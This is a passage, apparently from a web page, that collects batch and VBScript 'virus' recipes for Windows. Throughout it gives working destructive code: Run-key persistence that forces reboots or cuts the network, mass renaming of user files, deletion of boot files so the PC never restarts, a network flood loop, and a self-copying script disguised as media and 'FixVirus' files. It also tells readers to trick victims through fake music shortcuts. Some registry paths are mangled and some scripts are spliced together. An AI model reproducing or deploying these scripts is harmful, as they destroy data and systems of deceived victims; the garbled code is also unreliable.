echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
_______________________
Disable internet permanently
(save as hinternet.bat)

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
______________________________
Change files to non-working TXT files
(save as txt.bat)

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
______________
System Meltdown
(save as Crash.bat)

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE
_____________________
Temporarily flood network
(save as flood.bat)

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
_______________________
Temporarily disable internet
(save as internet.bat)

ipconfig /release

Shutdown Computer Once
(save as shutdown.bat)

shutdown -r -f -t0

Shut down the computer never to reboot again!

Virus that crashesh your own pc

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!



type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Make Your Cd Rom Tray Open And Close Repeatedly


The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or


(you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)
 
Set colCDROMs = oWMP.cdromCollection


if colCDROMs.Count >= 1 then




do


For i = 0 to colCDROMs.Count - 1


colCDROMs.Item(i).Eject


Next ' cdrom


For i = 0 to colCDROMs.Count - 1


colCDROMs.Item(i).Eject


Next ' cdrom


loop


end if

Make 1000 folders in a few seconds - Virus



Make over 1,000 folders in few seconds
Here you will learn a simple prank that will make an unlimited amount of folders in any place you want.

Step 1


Open notepad and type:







@echo off
:top
md %random%
goto top


@echo off makes it so that it appears to be a blank screen but actually it’s making hundreds of folder.

md %random% is command that creating folders with random names.

goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat
After that you will get icon that contain some type of wheels in it…
People probably not going to click on an icon that looks like that so to make it better (funnier and easier to prank people with) make a short-cut to it

Step 3
Right click on icon and click Create Shortcut

Step 4

Right click on shortcut and click properties, then click on Change Icon and rename icon
(Better if you changed the icon to a music icon)

tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized

something’s wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…v

Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton

start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer